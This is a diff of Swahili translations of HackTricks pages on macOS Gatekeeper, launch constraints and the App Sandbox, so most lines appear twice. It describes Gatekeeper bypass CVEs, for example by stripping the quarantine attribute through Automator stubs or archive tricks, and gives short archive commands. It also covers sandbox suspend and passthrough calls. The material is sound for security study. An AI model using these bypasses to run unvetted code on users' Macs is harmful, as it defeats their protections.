Hata hivyo, sasa hii haiwezekani kwa sababu macOS **inazuia kubadilisha faili** ndani ya bundles za programu. Hivyo, ukijaribu shambulio la [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md), utagundua kwamba si tena inawezekana kulitumia kwa sababu baada ya kutekeleza app ili kuikatia cache na Gatekeeper, huwezi kubadilisha bundle. Na ikiwa badala yake unabadilisha jina la saraka ya Contents kuwa NotCon (kama ilivyoonyeshwa katika exploit), kisha kutekeleza binary kuu ya app ili kuikatia cache na Gatekeeper, itasababisha kosa na haitatekelezwa.
Hata hivyo, sasa hii haiwezekani kwa sababu macOS **inazuia kubadilisha faili** ndani ya bundles za programu. Hivyo, ukijaribu shambulio la [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md), utaona kwamba si tena inawezekana kulitumia kwa sababu baada ya kutekeleza app ili kuikatia cache na Gatekeeper, huwezi kubadilisha bundle. Na ikiwa badala yake unabadilisha jina la saraka ya Contents kuwa NotCon (kama ilivyoonyeshwa katika exploit), kisha kutekeleza binary kuu ya app ili kuikatia cache na Gatekeeper, itasababisha kosa na haitatekelezwa.
## Mipango ya Kuepuka Gatekeeper
Njia yoyote ya kuepuka Gatekeeper (kufanikiwa kumfanya mtumiaji apakue kitu na kukitekeleza wakati Gatekeeper inapaswa kukataa) inachukuliwa kama udhaifu katika macOS. Hizi ni baadhi ya CVEs zilizotolewa kwa mbinu ambazo ziliruhusu kuepuka Gatekeeper katika siku za nyuma:
Njia yoyote ya kuepuka Gatekeeper (kufanikiwa kumfanya mtumiaji apakue kitu na kukitekeleza wakati Gatekeeper inapaswa kukikataa) inachukuliwa kuwa udhaifu katika macOS. Hizi ni baadhi ya CVEs zilizotolewa kwa mbinu ambazo ziliruhusu kuepuka Gatekeeper katika siku za nyuma:
### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)
@ -333,7 +333,7 @@ Angalia [**ripoti ya asili**](https://labs.withsecure.com/publications/the-disco
Wakati programu inaundwa kwa **Automator**, taarifa kuhusu kile inachohitaji kutekeleza iko ndani ya `application.app/Contents/document.wflow` si katika executable. Executable ni binary ya jumla ya Automator inayoitwa **Automator Application Stub**.
Kwa hivyo, unaweza kufanya `application.app/Contents/MacOS/Automator\ Application\ Stub` **kuashiria kwa kiungo cha alama kwa Automator Application Stub nyingine ndani ya mfumo** na itatekeleza kilichomo ndani ya `document.wflow` (script yako) **bila kuamsha Gatekeeper** kwa sababu executable halisi haina xattr ya karantini.
Kwa hivyo, unaweza kufanya `application.app/Contents/MacOS/Automator\ Application\ Stub` **kuashiria kwa kiungo cha alama kwa Automator Application Stub nyingine ndani ya mfumo** na itatekeleza kile kilichomo ndani ya `document.wflow` (script yako) **bila kuamsha Gatekeeper** kwa sababu executable halisi haina xattr ya karantini.
Mfano wa eneo linalotarajiwa: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
@ -341,11 +341,11 @@ Angalia [**ripoti ya asili**](https://ronmasas.com/posts/bypass-macos-gatekeeper
### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)
Katika kuepuka hii, faili ya zip iliundwa na programu ikianza kubana kutoka `application.app/Contents` badala ya `application.app`. Kwa hivyo, **sifa ya karantini** ilitumika kwa **faili zote kutoka `application.app/Contents`** lakini **siyo kwa `application.app`**, ambayo ilikuwa inakaguliwa na Gatekeeper, hivyo Gatekeeper iliepukwa kwa sababu wakati `application.app` ilipokanzwa **haikuwa na sifa ya karantini.**
Katika kuepuka hii, faili ya zip iliundwa na programu ikianza kubana kutoka `application.app/Contents` badala ya `application.app`. Kwa hivyo, **sifa ya karantini** ilitumika kwa **faili zote kutoka `application.app/Contents`** lakini **siyo kwa `application.app`**, ambayo ilikuwa inakaguliwa na Gatekeeper, hivyo Gatekeeper iliepukwa kwa sababu wakati `application.app` ilipohamasishwa **haikuwa na sifa ya karantini.**
```bash
zip -r test.app/Contents test.zip
```
Angalia [**ripoti ya asili**](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/) kwa maelezo zaidi.
Check the [**original report**](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/) for more information.
### [CVE-2022-32910](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32910)
@ -384,7 +384,7 @@ aa archive -d app -o test.aar
```
### [CVE-2023-27943](https://blog.f-secure.com/discovery-of-gatekeeper-bypass-cve-2023-27943/)
Iligundulika kwamba **Google Chrome haikuwa ikipanga sifa ya karantini** kwa faili zilizopakuliwa kwa sababu ya matatizo fulani ya ndani ya macOS.
Iligundulika kwamba **Google Chrome haikuwa ikipanga sifa ya karantini** kwa faili zilizopakuliwa kutokana na matatizo fulani ya ndani ya macOS.
### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
@ -426,6 +426,6 @@ aa archive -d s/ -o app.aar
### Zuia Quarantine xattr
Katika kifurushi cha ".app" ikiwa xattr ya quarantine haijongezwa, wakati wa kuendesha **Gatekeeper haitasababisha**.
Katika kifurushi cha ".app" ikiwa xattr ya quarantine haijaziwa, wakati wa kuendesha **Gatekeeper haitasababisha**.
{{#include ../../../banners/hacktricks-training.md}}

26
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
View File

@ -4,11 +4,11 @@
## Basic Information
Kikomo cha uzinduzi katika macOS kilianzishwa ili kuboresha usalama kwa **kudhibiti jinsi, nani, na kutoka wapi mchakato unaweza kuanzishwa**. Kilianza katika macOS Ventura, kinatoa mfumo unaopanga **kila binary ya mfumo katika makundi tofauti ya vizuizi**, ambavyo vin defined ndani ya **trust cache**, orodha inayojumuisha binaries za mfumo na hash zao husika. Vizuizi hivi vinapanuka kwa kila binary inayoweza kutekelezwa ndani ya mfumo, vinavyohusisha seti ya **kanuni** zinazoelezea mahitaji ya **kuanzisha binary maalum**. Kanuni hizo zinajumuisha vizuizi vya kujitegemea ambavyo binary lazima ikidhi, vizuizi vya mzazi vinavyohitajika kukidhi na mchakato wake wa mzazi, na vizuizi vya kuwajibika vinavyopaswa kufuatwa na vyombo vingine husika.
Kikomo cha uzinduzi katika macOS kilianzishwa ili kuboresha usalama kwa **kudhibiti jinsi, nani, na kutoka wapi mchakato unaweza kuanzishwa**. Kilianza katika macOS Ventura, kinatoa mfumo unaopanga **kila binary ya mfumo katika makundi tofauti ya vizuizi**, ambayo yamefafanuliwa ndani ya **cache ya kuaminika**, orodha inayojumuisha binaries za mfumo na hash zao husika. Vizuizi hivi vinapanuka kwa kila binary inayoweza kutekelezwa ndani ya mfumo, ikihusisha seti ya **kanuni** zinazofafanua mahitaji ya **kuanzisha binary maalum**. Kanuni hizo zinajumuisha vizuizi vya kujitegemea ambavyo binary lazima ikidhi, vizuizi vya mzazi vinavyohitajika kukidhi na mchakato wake wa mzazi, na vizuizi vya kuwajibika vinavyopaswa kufuatwa na vyombo vingine husika.
Mekaniki hii inapanuka kwa programu za wahusika wengine kupitia **Vizuizi vya Mazingira**, kuanzia macOS Sonoma, ikiruhusu wabunifu kulinda programu zao kwa kubainisha **seti ya funguo na thamani za vizuizi vya mazingira.**
Unapofafanua **vizuizi vya mazingira na maktaba** katika kamusi za vizuizi ambazo unaziokoa katika **faili za orodha ya mali za `launchd`**, au katika **faili za orodha za mali za tofauti** ambazo unazitumia katika saini ya msimbo.
Unapofafanua **vizuizi vya mazingira na maktaba** katika kamusi za vizuizi ambazo unaziokoa katika **faili za orodha ya mali za `launchd`**, au katika **faili za orodha za mali za kando** ambazo unazitumia katika saini ya msimbo.
Kuna aina 4 za vizuizi:
@ -25,21 +25,21 @@ Ikiwa wakati wa kupakia maktaba sehemu yoyote ya **vizuizi vya maktaba haviko kw
LC inaundwa na **fact** na **operesheni za kimantiki** (na, au..) zinazounganisha ukweli.
[ **Ukweli ambao LC inaweza kutumia umeandikwa**](https://developer.apple.com/documentation/security/defining_launch_environment_and_library_constraints). Kwa mfano:
[ **Facts ambazo LC inaweza kutumia zimeandikwa**](https://developer.apple.com/documentation/security/defining_launch_environment_and_library_constraints). Kwa mfano:
- is-init-proc: Thamani ya Boolean inayonyesha ikiwa executable lazima iwe mchakato wa kuanzisha wa mfumo wa uendeshaji (`launchd`).
- is-sip-protected: Thamani ya Boolean inayonyesha ikiwa executable lazima iwe faili iliyopewa ulinzi na Mfumo wa Uthibitisho wa Usalama (SIP).
- `on-authorized-authapfs-volume:` Thamani ya Boolean inayonyesha ikiwa mfumo wa uendeshaji ulipakia executable kutoka kwenye kiasi cha APFS kilichothibitishwa.
- `on-authorized-authapfs-volume`: Thamani ya Boolean inayonyesha ikiwa mfumo wa uendeshaji ulipakia executable kutoka kwenye kiasi cha APFS kilichothibitishwa.
- is-sip-protected: Thamani ya Boolean inayonyesha ikiwa executable lazima iwe faili iliyopewa ulinzi na Mfumo wa Uaminifu wa Mfumo (SIP).
- `on-authorized-authapfs-volume:` Thamani ya Boolean inayonyesha ikiwa mfumo wa uendeshaji ulipakia executable kutoka kwenye kiasi cha APFS kilichothibitishwa, kilichothibitishwa.
- `on-authorized-authapfs-volume`: Thamani ya Boolean inayonyesha ikiwa mfumo wa uendeshaji ulipakia executable kutoka kwenye kiasi cha APFS kilichothibitishwa, kilichothibitishwa.
- Kiasi cha Cryptexes
- `on-system-volume:` Thamani ya Boolean inayonyesha ikiwa mfumo wa uendeshaji ulipakia executable kutoka kwenye kiasi cha mfumo kilichozinduliwa kwa sasa.
- Ndani ya /System...
- ...
Wakati binary ya Apple imesainiwa in **itapewa LC category** ndani ya **trust cache**.
Wakati binary ya Apple imesainiwa in **itapewa LC category** ndani ya **cache ya kuaminika**.
- **iOS 16 LC categories** zilikuwa [**zimegeuzwa na kuandikwa hapa**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056).
- **LC categories za sasa (macOS 14** - Somona) zimegeuzwa na [**maelezo yao yanaweza kupatikana hapa**](https://gist.github.com/theevilbit/a6fef1e0397425a334d064f7b6e1be53).
- **iOS 16 LC categories** zilirejelewa na kuandikwa hapa [**hapa**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056).
- **LC categories za sasa (macOS 14** - Somona) zimekaguliwa na [**maelezo yao yanaweza kupatikana hapa**](https://gist.github.com/theevilbit/a6fef1e0397425a334d064f7b6e1be53).
Kwa mfano, Kategoria 1 ni:
```
@ -54,11 +54,11 @@ Parent Constraint: is-init-proc
### Kurejesha LC Categories
Una habari zaidi [**kuhusu hii hapa**](https://theevilbit.github.io/posts/launch_constraints_deep_dive/#reversing-constraints), lakini kimsingi, Zimewekwa katika **AMFI (AppleMobileFileIntegrity)**, hivyo unahitaji kupakua Kernel Development Kit ili kupata **KEXT**. Alama zinazohusiana na **`kConstraintCategory`** ndizo **za kuvutia**. Ukizitoa utapata mstream wa DER (ASN.1) uliokodishwa ambao utahitaji kufasiriwa na [ASN.1 Decoder](https://holtstrom.com/michael/tools/asn1decoder.php) au maktaba ya python-asn1 na skripti yake ya `dump.py`, [andrivet/python-asn1](https://github.com/andrivet/python-asn1/tree/master) ambayo itakupa mfuatano unaoeleweka zaidi.
Una habari zaidi [**kuhusu hii hapa**](https://theevilbit.github.io/posts/launch_constraints_deep_dive/#reversing-constraints), lakini kimsingi, Zimewekwa katika **AMFI (AppleMobileFileIntegrity)**, hivyo unahitaji kupakua Kernel Development Kit ili kupata **KEXT**. Alama zinazohusiana na **`kConstraintCategory`** ndizo **za kuvutia**. Ukizitoa utapata mstream wa DER (ASN.1) uliokodishwa ambao utahitaji kufasiriwa kwa [ASN.1 Decoder](https://holtstrom.com/michael/tools/asn1decoder.php) au maktaba ya python-asn1 na skripti yake ya `dump.py`, [andrivet/python-asn1](https://github.com/andrivet/python-asn1/tree/master) ambayo itakupa mfuatano unaoeleweka zaidi.
## Mipaka ya Mazingira
Hizi ni Mipaka ya Uzinduzi zilizowekwa katika **maombi ya wahusika wengine**. Mwandishi anaweza kuchagua **ukweli** na **operands za kimantiki kutumia** katika maombi yake ili kuzuia ufikiaji kwake mwenyewe.
Hizi ni Mipaka za Uzinduzi zilizowekwa katika **maombi ya wahusika wengine**. Mwandishi anaweza kuchagua **ukweli** na **operands za kimantiki kutumia** katika maombi yake ili kuzuia ufikiaji kwake mwenyewe.
Inawezekana kuhesabu Mipaka ya Mazingira ya programu kwa:
```bash
@ -81,7 +81,7 @@ Na katika iOS inaonekana kama iko katika **`/usr/standalone/firmware/FUD/StaticT
Faili za awali za hifadhi za kuaminika ziko katika muundo **IMG4** na **IM4P**, ambapo IM4P ni sehemu ya mzigo ya muundo wa IMG4.
Unaweza kutumia [**pyimg4**](https://github.com/m1stadev/PyIMG4) kutoa mzigo wa hifadhidata:
Unaweza kutumia [**pyimg4**](https://github.com/m1stadev/PyIMG4) kutoa mzigo wa databasi:
```bash
# Installation
python3 -m pip install pyimg4
@ -150,7 +150,7 @@ Hata hivyo, havipunguzi matumizi ya kawaida ya XPC, **Electron** kuingiza msimbo
Katika toleo la Sonoma, jambo muhimu ni **mipangilio ya wajibu** ya huduma ya XPC daemon. Huduma ya XPC inawajibika kwa ajili yake mwenyewe, tofauti na mteja anayounganisha kuwa na wajibu. Hii imeandikwa katika ripoti ya maoni FB13206884. Mpangilio huu unaweza kuonekana kuwa na kasoro, kwani unaruhusu mwingiliano fulani na huduma ya XPC:
- **Kuzindua Huduma ya XPC**: Ikiwa inachukuliwa kuwa hitilafu, mpangilio huu haukuruhusu kuanzisha huduma ya XPC kupitia msimbo wa mshambuliaji.
- **Kuungana na Huduma Inayoendelea**: Ikiwa huduma ya XPC tayari inaendesha (inaweza kuwa imeanzishwa na programu yake ya asili), hakuna vizuizi vya kuungana nayo.
- **Kuungana na Huduma Inayoendelea**: Ikiwa huduma ya XPC tayari inaendesha (inaweza kuwa imewezeshwa na programu yake ya asili), hakuna vizuizi vya kuungana nayo.
Wakati wa kutekeleza vizuizi kwenye huduma ya XPC kunaweza kuwa na manufaa kwa **kupunguza dirisha la mashambulizi yanayoweza kutokea**, haishughuliki wasiwasi wa msingi. Kuthibitisha usalama wa huduma ya XPC kimsingi kunahitaji **kuthibitisha mteja anayounganisha kwa ufanisi**. Hii inabaki kuwa njia pekee ya kuimarisha usalama wa huduma hiyo. Pia, inafaa kutaja kwamba mpangilio wa wajibu ulioelezwa kwa sasa unafanya kazi, ambayo huenda isiendane na muundo ulio kusudiwa.

64
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
View File

File diff suppressed because one or more lines are too long

74
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
View File

@ -19,7 +19,7 @@ Baadhi ya vipengele muhimu vya Sandbox ni:
### Containers
Kila programu iliyowekwa sandbox itakuwa na kontena yake katika `~/Library/Containers/{CFBundleIdentifier}` :
Kila programu iliyo ndani ya sandbox itakuwa na kontena yake mwenyewe katika `~/Library/Containers/{CFBundleIdentifier}` :
```bash
ls -l ~/Library/Containers
total 0
@ -30,7 +30,7 @@ drwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings
drwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler
[...]
```
Ndani ya kila folda ya kitambulisho cha kifurushi unaweza kupata **plist** na **Direktori ya Data** ya App yenye muundo unaofanana na folda ya Nyumbani:
Ndani ya kila folda ya kitambulisho cha kifurushi unaweza kupata **plist** na **Data directory** ya App yenye muundo unaofanana na folda ya Nyumbani:
```bash
cd /Users/username/Library/Containers/com.apple.Safari
ls -la
@ -106,7 +106,7 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
[...]
```
> [!WARNING]
> Kila kitu kilichoundwa/kilibadilishwa na programu ya Sandboxed kitapata **sifa ya karantini**. Hii itazuia nafasi ya sandbox kwa kuanzisha Gatekeeper ikiwa programu ya sandbox inajaribu kutekeleza kitu kwa **`open`**.
> Kila kitu kilichoundwa/kilibadilishwa na programu ya Sandboxed kitapata **sifa ya karantini**. Hii itazuia nafasi ya sandbox kwa kuanzisha Gatekeeper ikiwa programu ya sandbox itajaribu kutekeleza kitu kwa **`open`**.
## Profaili za Sandbox
@ -131,19 +131,19 @@ Hapa unaweza kupata mfano:
)
```
> [!TIP]
> Angalia hii [**utafiti**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **kuangalia vitendo zaidi ambavyo vinaweza kuruhusiwa au kukataliwa.**
> Angalia hii [**utafiti**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **kuangalia hatua zaidi ambazo zinaweza kuruhusiwa au kukataliwa.**
>
> Kumbuka kwamba katika toleo lililokusanywa la wasifu, majina ya operesheni yanabadilishwa na entries zao katika array inayojulikana na dylib na kext, na kufanya toleo lililokusanywa kuwa fupi na gumu kusoma.
**Huduma muhimu za mfumo** pia zinaendesha ndani ya **sandbox** zao maalum kama huduma ya `mdnsresponder`. Unaweza kuona hizi **sandbox profiles** maalum ndani ya:
Huduma muhimu za **sistimu** pia zinafanya kazi ndani ya **sandbox** zao maalum kama huduma ya `mdnsresponder`. Unaweza kuona hizi **sandbox profiles** maalum ndani ya:
- **`/usr/share/sandbox`**
- **`/System/Library/Sandbox/Profiles`**
- Profaili nyingine za sandbox zinaweza kuangaliwa katika [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
- Wasifu wengine wa sandbox wanaweza kuangaliwa katika [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
Mifumo ya **App Store** hutumia **wasifu** **`/System/Library/Sandbox/Profiles/application.sb`**. Unaweza kuangalia katika wasifu huu jinsi entitlements kama **`com.apple.security.network.server`** inavyoruhusu mchakato kutumia mtandao.
Programu za **App Store** zinatumia **wasifu** **`/System/Library/Sandbox/Profiles/application.sb`**. Unaweza kuangalia katika wasifu huu jinsi ruhusa kama **`com.apple.security.network.server`** inavyoruhusu mchakato kutumia mtandao.
Kisha, baadhi ya **huduma za daemon za Apple** hutumia wasifu tofauti zilizoko katika `/System/Library/Sandbox/Profiles/*.sb` au `/usr/share/sandbox/*.sb`. Sandboxes hizi zinatumika katika kazi kuu inayopiga simu API `sandbox_init_XXX`.
Kisha, baadhi ya **huduma za daemon za Apple** zinatumia wasifu tofauti zilizoko katika `/System/Library/Sandbox/Profiles/*.sb` au `/usr/share/sandbox/*.sb`. Sandboxes hizi zinatumika katika kazi kuu inayopiga simu kwa API `sandbox_init_XXX`.
**SIP** ni wasifu wa Sandbox unaoitwa platform_profile katika `/System/Library/Sandbox/rootless.conf`.
@ -216,7 +216,7 @@ Inawezekana kufuatilia ukaguzi wote sandbox inafanya kila wakati kitendo kinapok
(version 1)
(trace /tmp/trace.out)
```
Kisha tekeleza kitu chochote ukitumia profaili hiyo:
Na kisha tekeleza kitu chochote kwa kutumia profaili hiyo:
```bash
sandbox-exec -f /tmp/trace.sb /bin/ls
```
@ -239,11 +239,11 @@ MacOS inahifadhi wasifu wa sandbox wa mfumo katika maeneo mawili: **/usr/share/s
Na ikiwa programu ya upande wa tatu ina _**com.apple.security.app-sandbox**_ ruhusa, mfumo unatumia wasifu **/System/Library/Sandbox/Profiles/application.sb** kwa mchakato huo.
Katika iOS, wasifu wa default unaitwa **container** na hatuna uwakilishi wa maandiko wa SBPL. Katika kumbukumbu, sandbox hii inawakilishwa kama mti wa binary wa Ruhusu/Kataa kwa kila ruhusa kutoka kwenye sandbox.
Katika iOS, wasifu wa kawaida unaitwa **container** na hatuna uwakilishi wa maandiko wa SBPL. Katika kumbukumbu, sandbox hii inawakilishwa kama mti wa binary wa Ruhusu/Kataa kwa kila ruhusa kutoka sandbox.
### SBPL Maalum katika programu za App Store
Inawezekana kwa kampuni kufanya programu zao zifanye kazi **na wasifu wa Sandbox maalum** (badala ya wa default). Wanahitaji kutumia ruhusa **`com.apple.security.temporary-exception.sbpl`** ambayo inahitaji kuidhinishwa na Apple.
Inawezekana kwa kampuni kufanya programu zao zifanye kazi **na wasifu wa Sandbox maalum** (badala ya wa kawaida). Wanahitaji kutumia ruhusa **`com.apple.security.temporary-exception.sbpl`** ambayo inahitaji kuidhinishwa na Apple.
Inawezekana kuangalia ufafanuzi wa ruhusa hii katika **`/System/Library/Sandbox/Profiles/application.sb:`**
```scheme
@ -253,21 +253,21 @@ Inawezekana kuangalia ufafanuzi wa ruhusa hii katika **`/System/Library/Sandbox/
(let* ((port (open-input-string string)) (sbpl (read port)))
(with-transparent-redirection (eval sbpl)))))
```
Hii itafanya **eval string baada ya haki hii** kama profaili ya Sandbox.
Hii itakuwa **eval string baada ya haki hii** kama profaili ya Sandbox.
### Kukusanya & Kuondoa Profaili ya Sandbox
### Kuunda & Kuondoa Profaili ya Sandbox
Zana ya **`sandbox-exec`** inatumia kazi `sandbox_compile_*` kutoka `libsandbox.dylib`. Kazi kuu zilizotolewa ni: `sandbox_compile_file` (inatarajia njia ya faili, param `-f`), `sandbox_compile_string` (inatarajia string, param `-p`), `sandbox_compile_name` (inatarajia jina la kontena, param `-n`), `sandbox_compile_entitlements` (inatarajia entitlements plist).
Toleo hili lililogeuzwa na [**toleo lililofunguliwa la zana sandbox-exec**](https://newosxbook.com/src.jl?tree=listings&file=/sandbox_exec.c) linaruhusu **`sandbox-exec`** kuandika kwenye faili profaili ya sandbox iliyokusanywa.
Toleo hili lililogeuzwa na [**toleo la wazi la zana sandbox-exec**](https://newosxbook.com/src.jl?tree=listings&file=/sandbox_exec.c) linaruhusu **`sandbox-exec`** kuandika kwenye faili profaili ya sandbox iliyokusanywa.
Zaidi ya hayo, ili kufunga mchakato ndani ya kontena inaweza kuita `sandbox_spawnattrs_set[container/profilename]` na kupitisha kontena au profaili iliyopo.
## Debug & Kupita Sandbox
Katika macOS, tofauti na iOS ambapo michakato inafungwa kutoka mwanzo na kernel, **michakato lazima ijitolee kwenye sandbox yenyewe**. Hii inamaanisha katika macOS, mchakato hauzuiliwi na sandbox hadi uamuzi wa kuingia, ingawa programu za App Store daima zimefungwa.
Katika macOS, tofauti na iOS ambapo michakato imewekwa kwenye sandbox tangu mwanzo na kernel, **michakato lazima ijitolee kwenye sandbox yenyewe**. Hii inamaanisha katika macOS, mchakato haujawekewa vizuizi na sandbox hadi uamuzi wa kuingia, ingawa programu za App Store daima zimewekwa kwenye sandbox.
Michakato inafungwa kiotomatiki kutoka userland wanapoanza ikiwa zina haki: `com.apple.security.app-sandbox`. Kwa maelezo ya kina kuhusu mchakato huu angalia:
Michakato huwekwa kwenye Sandbox moja kwa moja kutoka userland wanapoanza ikiwa wana haki: `com.apple.security.app-sandbox`. Kwa maelezo ya kina kuhusu mchakato huu angalia:
{{#ref}}
macos-sandbox-debug-and-bypass/
@ -285,18 +285,18 @@ Marekebisho yanaruhusu kutoa haki zaidi kwa kitu na yanatoa wito kwa moja ya kaz
- `sandbox_extension_issue_generic`
- `sandbox_extension_issue_posix_ipc`
Marekebisho yanahifadhiwa katika slot ya pili ya lebo ya MACF inayopatikana kutoka kwa akidi za mchakato. Zana ifuatayo **`sbtool`** inaweza kufikia habari hii.
Marekebisho yanawekwa katika slot ya pili ya lebo ya MACF inayoweza kufikiwa kutoka kwa akidi za mchakato. Zana ifuatayo **`sbtool`** inaweza kufikia habari hii.
Kumbuka kwamba marekebisho kwa kawaida yanatolewa na michakato inayoruhusiwa, kwa mfano, `tccd` itatoa token ya marekebisho ya `com.apple.tcc.kTCCServicePhotos` wakati mchakato unajaribu kufikia picha na kuruhusiwa katika ujumbe wa XPC. Kisha, mchakato utahitaji kutumia token ya marekebisho ili iongezwe kwake.\
Kumbuka kwamba token za marekebisho ni ndefu hexadecimals zinazokodisha ruhusa zilizotolewa. Hata hivyo hazina PID inayoruhusiwa iliyowekwa kwa hivyo mchakato wowote wenye ufikiaji wa token unaweza **kutumiwa na michakato mingi**.
Kumbuka kwamba token za marekebisho ni nambari ndefu za hexadecimal zinazokodisha ruhusa zilizotolewa. Hata hivyo hazina PID inayoruhusiwa iliyowekwa kwa hivyo mchakato wowote wenye ufikiaji wa token unaweza **kutumiwa na michakato mingi**.
Kumbuka kwamba marekebisho yanahusiana sana na haki pia, hivyo kuwa na haki fulani kunaweza kutoa marekebisho fulani kiotomatiki.
Kumbuka kwamba marekebisho yanahusiana sana na haki pia, hivyo kuwa na haki fulani kunaweza kutoa kiotomatiki marekebisho fulani.
### **Angalia Haki za PID**
[**Kulingana na hii**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s), kazi za **`sandbox_check`** (ni `__mac_syscall`), zinaweza kuangalia **kama operesheni inaruhusiwa au la** na sandbox katika PID fulani, token ya ukaguzi au ID ya kipekee.
[**Kulingana na hii**](https://www.youtube.com/watch?v=mG715HcDgO8&t=3011s), kazi za **`sandbox_check`** (ni `__mac_syscall`), zinaweza kuangalia **kama operesheni inaruhusiwa au la** na sandbox katika PID fulani, token ya ukaguzi au kitambulisho cha kipekee.
[**Zana sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c) (ipate [iliyokusanywa hapa](https://newosxbook.com/articles/hitsb.html)) inaweza kuangalia kama PID inaweza kutekeleza vitendo fulani:
[**Zana sbtool**](http://newosxbook.com/src.jl?tree=listings&file=sbtool.c) (ipate [iliyokusanywa hapa](https://newosxbook.com/articles/hitsb.html)) inaweza kuangalia ikiwa PID inaweza kutekeleza vitendo fulani:
```bash
sbtool <pid> mach #Check mac-ports (got from launchd with an api)
sbtool <pid> file /tmp #Check file access
@ -315,9 +315,9 @@ Kumbuka kwamba ili kuita kazi ya kusitisha, haki fulani zinakaguliwa ili kuidhin
## mac_syscall
Kito hiki cha mfumo (#381) kinatarajia hoja ya kwanza ya maandiko ambayo itaonyesha moduli ya kuendesha, na kisha msimbo katika hoja ya pili ambayo itaonyesha kazi ya kuendesha. Kisha hoja ya tatu itategemea kazi iliyotekelezwa.
Kito hiki cha mfumo (#381) kinatarajia hoja ya kwanza ya maandiko ambayo itaonyesha moduli ya kuendesha, na kisha nambari katika hoja ya pili ambayo itaonyesha kazi ya kuendesha. Kisha hoja ya tatu itategemea kazi iliyotekelezwa.
Kazi `___sandbox_ms` inafunga `mac_syscall` ikionyesha katika hoja ya kwanza `"Sandbox"` kama vile `___sandbox_msp` ni kifungashio cha `mac_set_proc` (#387). Kisha, baadhi ya misimbo inayoungwa mkono na `___sandbox_ms` inaweza kupatikana katika jedwali hili:
Kazi `___sandbox_ms` inafunga `mac_syscall` ikionyesha katika hoja ya kwanza `"Sandbox"` kama vile `___sandbox_msp` ni kifungashio cha `mac_set_proc` (#387). Kisha, baadhi ya nambari zinazoungwa mkono na `___sandbox_ms` zinaweza kupatikana katika jedwali hili:
- **set_profile (#0)**: Tumia wasifu uliokamilishwa au uliopewa jina kwa mchakato.
- **platform_policy (#1)**: Lazimisha ukaguzi wa sera maalum za jukwaa (hubadilika kati ya macOS na iOS).
@ -327,48 +327,48 @@ Kazi `___sandbox_ms` inafunga `mac_syscall` ikionyesha katika hoja ya kwanza `"S
- **extension_issue (#5)**: Tengeneza nyongeza mpya kwa mchakato.
- **extension_consume (#6)**: Tumia nyongeza iliyotolewa.
- **extension_release (#7)**: Achilia kumbukumbu iliyohusishwa na nyongeza iliyotumiwa.
- **extension_update_file (#8)**: Badilisha vigezo vya nyongeza ya faili iliyopo ndani ya sandbox.
- **extension_twiddle (#9)**: Rekebisha au badilisha nyongeza ya faili iliyopo (mfano, TextEdit, rtf, rtfd).
- **extension_update_file (#8)**: Badilisha vigezo vya nyongeza iliyopo ndani ya sandbox.
- **extension_twiddle (#9)**: Rekebisha au badilisha nyongeza iliyopo (mfano, TextEdit, rtf, rtfd).
- **suspend (#10)**: Kusitisha kwa muda ukaguzi wote wa sandbox (inahitaji haki zinazofaa).
- **unsuspend (#11)**: Anza tena ukaguzi wote wa sandbox uliositishwa hapo awali.
- **passthrough_access (#12)**: Ruhusu ufikiaji wa moja kwa moja kwa rasilimali, ukipita ukaguzi wa sandbox.
- **set_container_path (#13)**: (iOS pekee) Weka njia ya kontena kwa kikundi cha programu au kitambulisho cha saini.
- **container_map (#14)**: (iOS pekee) Pata njia ya kontena kutoka `containermanagerd`.
- **sandbox_user_state_item_buffer_send (#15)**: (iOS 10+) Weka metadata ya hali ya mtumiaji katika sandbox.
- **inspect (#16)**: Toa taarifa za ufuatiliaji kuhusu mchakato ulio katika sandbox.
- **inspect (#16)**: Toa taarifa za ufuatiliaji kuhusu mchakato wa sandboxed.
- **dump (#18)**: (macOS 11) Tupa wasifu wa sasa wa sandbox kwa ajili ya uchambuzi.
- **vtrace (#19)**: Fuata operesheni za sandbox kwa ajili ya ufuatiliaji au ufuatiliaji.
- **builtin_profile_deactivate (#20)**: (macOS < 11) Zima wasifu uliopewa jina (mfano, `pe_i_can_has_debugger`).
- **check_bulk (#21)**: Fanya operesheni nyingi za `sandbox_check` katika wito mmoja.
- **reference_retain_by_audit_token (#28)**: Tengeneza rejeleo kwa tokeni ya ukaguzi kwa matumizi katika ukaguzi wa sandbox.
- **reference_release (#29)**: Achilia rejeleo la tokeni ya ukaguzi iliyoshikiliwa hapo awali.
- **rootless_allows_task_for_pid (#30)**: Thibitisha ikiwa `task_for_pid` inaruhusiwa (kama vile ukaguzi wa `csr`).
- **rootless_allows_task_for_pid (#30)**: Thibitisha ikiwa `task_for_pid` inaruhusiwa (kama `csr` ukaguzi).
